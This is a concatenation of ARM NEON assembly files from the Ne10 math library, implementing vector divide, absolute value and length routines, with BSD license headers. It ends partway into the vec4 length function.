@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_div_float(arm_float_t * dst,
@ arm_float_t * src1,
@ arm_float_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_float
.L_residualloop_float:
@ process the residual items in the input array
vld1.f32 d0[0], [r1]! @ Fill in d0[0]
vld1.f32 d1[0], [r2]! @ Fill in d1[1]
subs r4, r4, #1
@ values d0 = d0 / d1
vrecpe.f32 d3, d1
vrecps.f32 d1, d3, d1
vmul.f32 d3, d1, d3
vmul.f32 d0, d0, d3
vst1.32 {d0[0]}, [r0]!
bgt .L_residualloop_float
.L_check_mainloop_float:
cbz r3, .L_return_float
@ load the current set of values
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
.L_mainloop_float:
@ calculate values for the 2nd/next (e.g. 3rd) set
vrecpe.f32 q3, q1
vrecps.f32 q1, q3, q1
vmul.f32 q3, q1, q3
vmul.f32 q3, q0, q3
@ store the result for the 1st/next (e.g. 3rd) set
vst1.32 {d6,d7}, [r0]!
subs r3, r3, #1
@ load the next (e.g. 3rd) set of values
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
bgt .L_mainloop_float @ loop if r3 > 0, if we have at least another 4 floats
.L_return_float:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_vdiv_vec2f_neon
.thumb
.thumb_func
ne10_vdiv_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_div_float(arm_vec2f_t * dst,
@ arm_vec2f_t * src1,
@ arm_vec2f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec2
.L_residualloop_vec2:
@ process the residual items in the input array
vld1.f32 d0, [r1]!
vld1.f32 d1, [r2]!
subs r4, r4, #1
@ calculate values
@ d0 = d0 / d1
vrecpe.f32 d4, d1
vrecps.f32 d1, d4, d1
vmul.f32 d4, d1, d4
vmul.f32 d0, d0, d4
vst1.32 {d0}, [r0]!
bgt .L_residualloop_vec2
.L_check_mainloop_vec2:
cbz r3, .L_return_vec2
@ load the current set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
.L_mainloop_vec2:
@ calculate values for current set
@ q8 = q0 / q2
vrecpe.f32 q8, q2
vrecps.f32 q2, q8, q2
vmul.f32 q8, q2, q8
vmul.f32 q8, q0, q8
@ q9 = q1 / q3
vrecpe.f32 q9, q3
vrecps.f32 q3, q9, q3
vmul.f32 q9, q3, q9
vmul.f32 q9, q1, q9
@ store the result for current set
vst2.32 {d16,d17,d18,d19}, [r0]!
subs r3, r3, #1
@ load the next set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
bgt .L_mainloop_vec2 @ loop if r3 > 0, if we have at least another 4 vectors (8 floats) to process
.L_return_vec2:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_vdiv_vec3f_neon
.thumb
.thumb_func
ne10_vdiv_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_div_float(arm_vec3f_t * dst,
@ arm_vec3f_t * src1,
@ arm_vec3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec3
.L_residualloop_vec3:
@ process the residual items in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
subs r4, r4, #1
@ calculate values for
vrecpe.f32 d18, d1
vrecps.f32 d1 , d18, d1
vmul.f32 d18, d1 , d18
vmul.f32 d0 , d0 , d18
vrecpe.f32 d20, d3
vrecps.f32 d3 , d20, d3
vmul.f32 d20, d3 , d20
vmul.f32 d2 , d2 , d20
vrecpe.f32 d22, d5
vrecps.f32 d5 , d22, d5
vmul.f32 d22, d5 , d22
vmul.f32 d4 , d4 , d22
vst3.32 {d0[0], d2[0], d4[0]}, [r0]!
bgt .L_residualloop_vec3
.L_check_mainloop_vec3:
cbz r3, .L_return_vec3
@ load current set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d18, d20, d22}, [r2]!
vld3.32 {d19, d21, d23}, [r2]!
.L_mainloop_vec3:
@ calculate values for current set
@ q12 = q0 / q9
vrecpe.f32 q12, q9
vrecps.f32 q9 , q12, q9
vmul.f32 q12, q9 , q12
vmul.f32 q12, q0 , q12
@ q13 = q1 / q10
vrecpe.f32 q13, q10
vrecps.f32 q10 , q13, q10
vmul.f32 q13, q10 , q13
vmul.f32 q13, q1 , q13
@ q14 = q2 / q11
vrecpe.f32 q14, q11
vrecps.f32 q11 , q14, q11
vmul.f32 q14, q11 , q14
vmul.f32 q14, q2 , q14
@ store the result for current set
vst3.32 {d24, d26, d28}, [r0]!
vst3.32 {d25, d27, d29}, [r0]!
subs r3, r3, #1
@ load next set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d18, d20, d22}, [r2]!
vld3.32 {d19, d21, d23}, [r2]!
bgt .L_mainloop_vec3 @ loop if r3 > 0, if we have at least another 4 vectors (12 floats) to process
.L_return_vec3:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_vdiv_vec4f_neon
.thumb
.thumb_func
ne10_vdiv_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_div_float(arm_vec4f_t * dst,
@ arm_vec4f_t * src1,
@ arm_vec4f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec4
.L_residualloop_vec4:
@ process the last few items left in the input array
vld1.f32 {d0, d1}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, V1.y, V1.z, V1.w };
vld1.f32 {d2, d3}, [r2]! @ The values are loaded like so:
@ q1 = { V2.x, V2.y, V2.z, V2.w };
subs r4, r4, #1
@ calculate values
@ q0 = q0 / q1
vrecpe.f32 q2, q1
vrecps.f32 q1 , q2, q1
vmul.f32 q2, q1 , q2
vmul.f32 q0 , q0 , q2
vst1.32 {d0, d1}, [r0]!
bgt .L_residualloop_vec4
.L_check_mainloop_vec4:
cbz r3, .L_return_vec4
@ load the current set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
.L_mainloop_vec4:
@ calculate values for current set
@ q12 = q0 / q8
vrecpe.f32 q12, q8
vrecps.f32 q8 , q12, q8
vmul.f32 q12, q8 , q12
vmul.f32 q12, q0 , q12
@ q13 = q1 / q9
vrecpe.f32 q13, q9
vrecps.f32 q9 , q13, q9
vmul.f32 q13, q9 , q13
vmul.f32 q13, q1 , q13
@ q14 = q2 / q10
vrecpe.f32 q14, q10
vrecps.f32 q10 , q14, q10
vmul.f32 q14, q10 , q14
vmul.f32 q14, q2 , q14
@ q15 = q3 / q11
vrecpe.f32 q15, q11
vrecps.f32 q11 , q15, q11
vmul.f32 q15, q11 , q15
vmul.f32 q15, q3 , q15
@ store the result for current set
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
subs r3, r3, #1
@ load the next set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
bgt .L_mainloop_vec4 @ loop if r3 > 0, if we have at least another 4 vectors (16 floats) to process
.L_return_vec4:
@ return
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 1,607 | modules/math/NE10_addmat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_addmat.asm.s
@
|
open-vela/external_Ne10 | 11,069 | modules/math/NE10_abs.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_abs.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_abs_float_neon
.thumb
.thumb_func
ne10_abs_float_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_abs_float(arm_float_t * dst,
@ arm_float_t * src,
@ unsigned int count);
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are residual that will be processed at the begin of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4; calculate the residual loop
asr r2, r2, #2 @ r2 = count >> 2; calculate the main loop
cbz r3, .L_check_mainloop_float
.L_residualloop_float:
@ process the residual items in the input array
vld1.f32 d0[0], [r1]! @ Fill in d0 = { V.x, 0 };
subs r3, r3, #1
@ absolute values
vabs.f32 d0, d0
vst1.32 {d0[0]}, [r0]!
bgt .L_residualloop_float
.L_check_mainloop_float:
cbz r2, .L_return_float
@ load the current set of values
vld1.32 {q0}, [r1]! @ for current set
.L_mainloop_float:
@ absolute values of the current set
vabs.f32 q3, q0 @ q3 = abs( q0 )
@ store the result for the current set
vst1.32 {d6,d7}, [r0]!
subs r2, r2, #1
@ load the next set
vld1.32 {q0}, [r1]!
bgt .L_mainloop_float @ loop if r2 > 0, if we have another 4 floats
.L_return_float:
@ return
mov r0, #0
bx lr
.align 4
.global ne10_abs_vec2f_neon
.thumb
.thumb_func
ne10_abs_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_abs_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src,
@ unsigned int count);
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are residual that will be processed at the begin of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4; calculate the residual loop
asr r2, r2, #2 @ r2 = count >> 2; calculate the main loop
cbz r3, .L_check_mainloop_vec2
.L_residualloop_vec2:
@ process the residual items in the input array
vld1.f32 d0, [r1]! @ Fill in d0 = { V.x, V.y };
subs r3, r3, #1
@ absolute values
vabs.f32 d0, d0
vst1.32 {d0}, [r0]!
bgt .L_residualloop_vec2
.L_check_mainloop_vec2:
cbz r2, .L_return_vec2
@ load the current set of values
vld2.32 {q0-q1}, [r1]! @ for current set
.L_mainloop_vec2:
@ absolute values of the current set
vabs.f32 q3, q0 @ q3 = abs( q0 )
vabs.f32 q4, q1 @ q4 = abs( q1 )
@ store the result for the current set
vst2.32 {d6,d7,d8,d9}, [r0]!
subs r2, r2, #1
@ load the next set
vld2.32 {q0-q1}, [r1]!
bgt .L_mainloop_vec2 @ loop if r2 > 0, if we have another 4 vec2s
.L_return_vec2:
@ return
mov r0, #0
bx lr
.align 4
.global ne10_abs_vec3f_neon
.thumb
.thumb_func
ne10_abs_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_abs_vec3f(arm_vec3t_t * dst,
@ arm_vec3f_t * src,
@ unsigned int count);
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are residual that will be processed at the begin of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4; calculate the residual loop
asr r2, r2, #2 @ r2 = count >> 2; calculate the main loop
cbz r3, .L_check_mainloop_vec3
.L_residualloop_vec3:
@ process the residual items in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V.x, -, -, - };
@ q1 = { V.y, -, -, - };
@ q2 = { V.z, -, -, - };
subs r3, r3, #1
@ absolute values
vabs.f32 d0, d0
vabs.f32 d2, d2
vabs.f32 d4, d4
vst3.32 {d0[0], d2[0], d4[0]}, [r0]!
bgt .L_residualloop_vec3
.L_check_mainloop_vec3:
cbz r2, .L_return_vec3
@ load the current set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]! @ for current set
.L_mainloop_vec3:
@ absolute values of the current set
vabs.f32 q5, q0
vabs.f32 q6, q1
vabs.f32 q7, q2
@ store the result for the current set
vst3.32 {d10, d12, d14}, [r0]!
vst3.32 {d11, d13, d15}, [r0]!
subs r2, r2, #1
@ load the next set
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]! @ for next set
bgt .L_mainloop_vec3 @ loop if r2 > 0, if we have another 4 vec3s
.L_return_vec3:
@ return
mov r0, #0
bx lr
.align 4
.global ne10_abs_vec4f_neon
.thumb
.thumb_func
ne10_abs_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_abs_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src,
@ unsigned int count);
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are residual that will be processed at the begin of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4; calculate the residual loop
asr r2, r2, #2 @ r2 = count >> 2; calculate the main loop
cbz r3, .L_check_mainloop_vec4
.L_residualloop_vec4:
@ process the residual items in the input array
vld1.f32 {d0, d1}, [r1]! @ The values are loaded like so:
@ q0 = { V.x, V.y, V.z, V.w };
subs r3, r3, #1
@ absolute values
vabs.f32 q0, q0
vst1.32 {d0, d1}, [r0]!
bgt .L_residualloop_vec4
.L_check_mainloop_vec4:
cbz r2, .L_return_vec4
@ load the current set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]! @ for current set
.L_mainloop_vec4:
@ absolute values of the current set
vabs.f32 q10, q0
vabs.f32 q11, q1
vabs.f32 q12, q2
vabs.f32 q13, q3
@ store the result for the current set
vst4.32 {d20, d22, d24, d26}, [r0]!
vst4.32 {d21, d23, d25, d27}, [r0]!
subs r2, r2, #1
@ load the next set
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]! @ for next set
bgt .L_mainloop_vec4 @ loop if r2 > 0, if we have another 4 vec4s
.L_return_vec4:
@ return
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 1,608 | modules/math/NE10_submat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_submat.asm.s
@
|
open-vela/external_Ne10 | 12,661 | modules/math/NE10_len.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_len.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_len_vec2f_neon
.thumb
.thumb_func
ne10_len_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_len_vec2f(arm_float_t * dst,
@ arm_vec2f_t * src,
@ unsigned int count);
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are left to be processed at the end of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cbz r2, .L_check_vec2
@ load values for the first iteration
vld2.32 {q0-q1}, [r1]!
subs r2, r2, #4
@ calculate sum of square of the components
vmul.f32 q2, q0, q0
vmla.f32 q2, q1, q1
ble .L_mainloopend_vec2
.L_mainloop_vec2:
@ load the next set of values
vld2.32 {q0-q1}, [r1]!
subs r2, r2, #4
@ get SQRT of the last vector while loading a new vector
vrsqrte.f32 q3, q2
vmul.f32 q8, q2, q3
vrsqrts.f32 q8, q8, q3
vmul.f32 q8, q3, q8
vmul.f32 q2, q2, q8
vst1.32 {q2}, [r0]!
@ calculate sum of square of the components
vmul.f32 q2, q0, q0
vmla.f32 q2, q1, q1
bgt .L_mainloop_vec2 @ loop if r2 is > r3, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_vec2:
@ the last iteration for this call
@ get SQRT of the last vector
vrsqrte.f32 q3, q2
vmul.f32 q8, q2, q3
vrsqrts.f32 q8, q8, q3
vmul.f32 q8, q3, q8
vmul.f32 q2, q2, q8
vst1.32 {q2}, [r0]!
.L_check_vec2:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_vec2
.L_secondloop_vec2:
@ process the last few items left in the input array
vld1.f32 d0, [r1]! @ Fill in d0 = { V.x, V.y };
subs r3, r3, #1
vmul.f32 d0, d0, d0 @ d0= { V.x^2, V.y^2 };
vpadd.f32 d0, d0, d0 @ d0= { V.x^2 + (V.y^2), V.y^2 + (V.x^2) }; // d0 = d0 + (d1^2)
@ get SQRT of the vector
vrsqrte.f32 d2, d0
vmul.f32 d1, d0, d2
vrsqrts.f32 d1, d1, d2
vmul.f32 d1, d2, d1
vmul.f32 d0, d0, d1
vst1.32 d0[0], [r0]!
bgt .L_secondloop_vec2
.L_return_vec2:
@ return
mov r0, #0
bx lr
.align 2
.global ne10_len_vec3f_neon
.thumb
.thumb_func
ne10_len_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_len_vec3f(arm_float_t * dst,
@ arm_vec3f_t * src,
@ unsigned int count);
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are left to be processed at the end of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cbz r2, .L_check_vec3
@ load values for the first iteration
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
subs r2, r2, #4
@ calculate sum of square of the components
vmul.f32 q9, q0, q0
vmla.f32 q9, q1, q1
vmla.f32 q9, q2, q2
ble .L_mainloopend_vec3
.L_mainloop_vec3:
@ load the next set of values
vld3.32 {d0,d2,d4}, [r1]!
vld3.32 {d1,d3,d5}, [r1]!
subs r2, r2, #4
@ get SQRT of the last vector while loading a new vector
vrsqrte.f32 q3, q9
vmul.f32 q8, q9, q3
vrsqrts.f32 q8, q8, q3
vmul.f32 q8, q3, q8
vmul.f32 q9, q9, q8
vst1.32 {q9}, [r0]!
@ calculate sum of square of the components
vmul.f32 q9, q0, q0
vmla.f32 q9, q1, q1
vmla.f32 q9, q2, q2
bgt .L_mainloop_vec3 @ loop if r2 is > r3, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_vec3:
@ the last iteration for this call
@ get SQRT of the last vector
vrsqrte.f32 q3, q9
vmul.f32 q8, q9, q3
vrsqrts.f32 q8, q8, q3
vmul.f32 q8, q3, q8
vmul.f32 q9, q9, q8
vst1.32 {q9}, [r0]!
.L_check_vec3:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_vec3
.L_secondloop_vec3:
@ process the last few items left in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V.x, -, -, - };
@ q1 = { V.y, -, -, - };
@ q2 = { V.z, -, -, - };
subs r3, r3, #1
vmul.f32 q0, q0, q0 @ V.x^2
vmla.f32 q0, q1, q1 @ V.x^2 + V.y^2
vmla.f32 q0, q2, q2 @ V.x^2 + V.y^2 + V.z^2
@ get SQRT of the vector
vrsqrte.f32 q2, q0
vmul.f32 q1, q0, q2
vrsqrts.f32 q1, q1, q2
vmul.f32 q1, q2, q1
vmul.f32 q0, q0, q1
vst1.32 d0[0], [r0]!
bgt .L_secondloop_vec3
.L_return_vec3:
@ return
mov r0, #0
bx lr
.align 2
.global ne10_len_vec4f_neon
.thumb
.thumb_func
ne10_len_vec4f_neon:
